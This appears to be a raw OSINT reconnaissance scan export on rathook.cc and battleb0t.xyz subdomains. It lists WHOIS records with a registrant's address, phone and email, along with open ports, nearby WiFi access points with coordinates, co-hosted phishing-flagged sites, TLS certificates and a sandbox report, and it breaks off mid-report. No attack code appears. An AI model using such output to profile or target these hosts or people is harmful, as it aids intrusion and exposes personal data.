advertising or solicitations via e-mail, telephone, or facsimile; or
(2) enable high volume, automated, electronic processes that apply to
VeriSign (or its computer systems). The compilation, repackaging,
dissemination or other use of this Data is expressly prohibited without
the prior written consent of VeriSign. You agree not to use electronic
processes that are automated and high-volume to access or query the
Whois database except as reasonably necessary to register domain names
or modify existing registrations. VeriSign reserves the right to restrict
your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
Domain Name: RATHOOK.CC
Registry Domain ID: 163793658_DOMAIN_CC-VRSN
Registrar WHOIS Server: whois.porkbun.com
Registrar URL: http://www.porkbun.com
Updated Date: 2022-01-28 17:32:18
Created Date: 2021-09-13 01:07:39
Registrar Registration Expiration Date: 2024-09-13 01:07:39
Registrar: Porkbun LLC
Registrar IANA ID: 1861
Registrar Abuse Contact Email: abuse@porkbun.com
Registrar Abuse Contact Phone: +1.5038508351
Domain Status: clientTransferProhibited http://icann.org/epp#clientTransferProhibited
Domain Status: clientDeleteProhibited http://icann.org/epp#clientDeleteProhibited
Registry Registrant ID:
Registrant Name: d3f c0n6
Registrant Organization: Boat Rolling Inc
Registrant Street: 10 Voie de l'Excelsior
Registrant City: Val-de-Reuil
Registrant State/Province: Normandy
Registrant Postal Code: 27100
Registrant Country: FR
Registrant Phone: +33:FR.268605683
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: d3fc0n6@protonmail.com
Registry Admin ID:
Admin Name: d3f c0n6
Admin Organization: Boat Rolling Inc
Admin Street: 10 Voie de l'Excelsior
Admin City: Val-de-Reuil
Admin State/Province: Normandy
Admin Postal Code: 27100
Admin Country: FR
Admin Phone: +33:FR.268605683
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: d3fc0n6@protonmail.com
Registry Tech ID:
Tech Name: d3f c0n6
Tech Organization: Boat Rolling Inc
Tech Street: 10 Voie de l'Excelsior
Tech City: Val-de-Reuil
Tech State/Province: Normandy
Tech Postal Code: 27100
Tech Country: FR
Tech Phone: +33:FR.268605683
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: d3fc0n6@protonmail.com
Name Server: curitiba.ns.porkbun.com
Name Server: fortaleza.ns.porkbun.com
Name Server: salvador.ns.porkbun.com
Name Server: maceio.ns.porkbun.com
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net
>>> Last update of WHOIS database: 2022-01-28 17:32:18 <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
The Data in the Porkbun LLC WHOIS database is provided by Porkbun LLC for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Porkbun LLC does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this Data only for lawful purposes and that, under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail (spam); or (2) enable high volume, automated, electronic processes that apply to Porkbun LLC (or its systems). Porkbun LLC reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Porkbun!
| rathook.cc |
| 2023-05-12 03:16:21 | Physical Location | No | ipapi.co | 0 | 0 | 2 | 0 | None | London, England, ENG, United Kingdom, GB | 2a06:98c1:3120::1 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomAE9EF4 (Net ID: 00:0C:F6:AE:9E:F4) | 50.8897, 6.0563 |
| 2023-05-12 03:19:24 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.109.154:80 | 185.199.109.0/24 |
| 2023-05-12 02:47:42 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 35.229.48.116:443 | 35.229.48.116 |
| 2023-05-12 02:52:01 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [Hybrid Analysis raw sandbox report dump omitted] | 185.199.108.153 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 2 | 0 | None | (c) CentralNic Ltd | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 02:44:44 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 3 | 0 | None | HTTP/3 | vscode.battleb0t.xyz |
| 2023-05-12 03:36:14 | Blacklisted IP on Same Subnet | Yes | DroneBL | 0 | 0 | 4 | 0 | None | dronebl.org - HTTP Proxy (45.131.109.106) | 45.131.109.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Heisenberg (Net ID: 00:0C:F6:D0:27:08) | 50.8897, 6.0563 |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:8880 | 172.67.135.9 |
| 2023-05-12 02:55:22 | Raw Data from RIRs | No | Google | 0 | 0 | 1 | 0 | None | {'webSearchUrl': u'https://www.google.com/search?q=site:ayhu.xyz&aq=t&oe=utf-8&client=firefox-a&ie=utf-8&rls=org.mozilla%3Aen-US%3Aofficial', 'urls': ['https://ayhu.xyz/', 'https://ayhu.xyz/lol.html']} | ayhu.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | pfa (Net ID: 00:02:6F:C4:70:30) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:09:51 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.93 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | PACSStemp (Net ID: 00:0F:66:D6:82:2B) | 32.8608, -79.9746 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Mistrzowie (Category: images)
https://mistrzowie.org/user/login | login |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | InkBunny (Category: XXXPORNXXX)
https://inkbunny.net/login | login |
| 2023-05-12 03:13:01 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-range.github.io]
https://www.openphish.com/feed.txt | 0-range.github.io |
| 2023-05-12 03:13:09 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [01010101coder.github.io]
https://www.openphish.com/feed.txt | 01010101coder.github.io |
| 2023-05-12 03:23:44 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.17:443 | 188.114.96.0/24 |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:80 | 104.21.71.14 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | XTN-25BD34 (Net ID: 70:F8:E7:25:BD:34) | 37.751, -97.822 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Guest (Net ID: 00:01:21:30:AF:A1) | 41.8781, -87.6298 |
| 2023-05-12 03:23:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.6:443 | 188.114.96.0/24 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SpaceStation (Net ID: 00:02:2D:01:CF:F8) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MatrixEx Guest (Net ID: 00:01:21:26:42:60) | 41.8781, -87.6298 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet8682 (Net ID: 00:01:36:5B:86:80) | 37.780462,-122.390564 |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:74:c7:69:09:be:bf:85:53:83:95:0e:84:5e:23:6b:8f:95
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 27 17:04:53 2023 GMT
Not After : Jun 25 17:04:52 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1F:80:B0:A7:B9:49:16:0F:27:7B:7C:B9:F5:38:B5:3D:C9:3C:2F:40
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 27 18:04:53.353 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 27 18:04:53.360 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 02:56:55 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | files.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:b9:dc:49:67:68:c5:fe:31:cf:92:a4:a3:f2:91:5a:dc:15
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 2 19:07:11 2023 GMT
Not After : Apr 2 19:07:10 2023 GMT
Subject: CN=files.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CF:FE:0F:FB:EC:E3:E9:7B:CF:AB:EA:49:61:6D:B0:C0:A0:EB:11:BC
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:files.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 2 20:07:12.002 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77:
15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13
Timestamp : Jan 2 20:07:12.157 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | cloudflare.net |
| 2023-05-12 02:59:57 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | mery.robinson@ftb.ca.gov | |
| 2023-05-12 03:03:38 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00x44.github.io |
| 2023-05-12 02:44:38 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Google Analytics | nuke.battleb0t.xyz |
| 2023-05-12 02:53:52 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "X_Cache_Hits": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "X_Github_Request_Id": ["43CE:4ADD:8C38CD:9E6CB7:645D800F"], "Etag": ["W/\"64556a8c-239b\""], "Age": ["0"], "Vary": ["Accept-Encoding"], "X_Served_By": ["cache-gig2250056-GIG"], "X_Cache_Hits": ["0"], "X_Timer": ["S1683849232.554003,VS0,VE234"], "Connection": ["keep-alive"], "Via": ["1.1 varnish"], "X_Fastly_Request_Id": ["c52142f897e3b3bde7efbc782ee478e7cae3ad86"], "Content_Type": ["text/html; charset=utf-8"], "Date": ["<REDACTED>"], "X_Cache": ["MISS"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "Server": ["GitHub.com"], "Accept_Ranges": ["bytes"]} | 2606:50c0:8003::153 |
| 2023-05-12 03:09:44 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 126.97.148.34.bc.googleusercontent.com | 34.148.97.126 |
| 2023-05-12 02:53:03 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 2 | 0 | None | [{"url": "https://pics.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | pics.battleb0t.xyz |
| 2023-05-12 02:55:46 | Linked URL - Internal | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | http://kekw.battleb0t.xyz/jar | 64.226.81.43 |
| 2023-05-12 02:59:56 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | korea@netflix.com | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://kangbinkwon.github.io/kangbinkwon-Netflix_clonecoding/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_6d4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_6d4_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_6d4_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1748"\n "IsoScope_6d4_IE_EarlyTabStart_0xdf8_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_6d4_ConnHashTable<1748>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_6d4_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1748"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, 
u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "104.18.22.52:443"\n "69.16.175.10:443"\n "45.57.90.1:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"assets.nflxext.com"\n "code.jquery.com"\n "kangbinkwon.github.io"\n "pro.fontawesome.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<a class="authLinks lang" href="https://www.netflix.com/kr/login"></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<form class="cta-form" action="https://www.netflix.com/signup/registration?locale=ko-KR">" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<span class="lang"> . 
PC netflix.com ," (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/ko/node/412" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/ko/" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://www.netflix.com/kr/login?nextpage=https%3A%2F%2Fwww.netflix.com%2Fyouraccount"" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://media.netflix.com/ko/" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://jobs.netflix.com/" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://devices.netflix.com/ko/" class="footer-link"><span" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/legal/termsofuse" class="footer-link"><span" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/legal/privacy" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/legal/corpinfo" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/ko/contactus" 
class="footer-link"><span class="lang"></span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/legal/notices" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://www.netflix.com/kr/browse/genre/839338" class="footer-link"><span class="lang">Netflix" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<div class="copy-text-block lang"> : korea@netflix.com</div>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"card-01-hero-card_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "card-05_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "card-04-devices_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "cookieSetting_1_.png" has type "PNG image data 766 x 605 8-bit/color RGBA non-interlaced" and extension 
"png"\n "card-03-mobile_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3" and extension "jpg"\n "card-03-download_1_.gif" has type "GIF image data version 89a 100 x 100" and extension "gif"\n "card-03-boxshot_1_.png" has type "PNG image data 150 x 210 8-bit colormap non-interlaced" and extension "png"\n "card-02-tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fa-light-300_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Light family"- [targetUID: N/A]\n "fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Regular family"- [targetUID: N/A]\n "fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Solid family"- [targetUID: N/A]\n "card-01-hero-card_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "card-05_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "all_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "card-04-devices_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "cookieSetting_1_.png" has type "PNG image data 766 x 605 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "jquery-3.6.0.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "card-03-mobile_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 
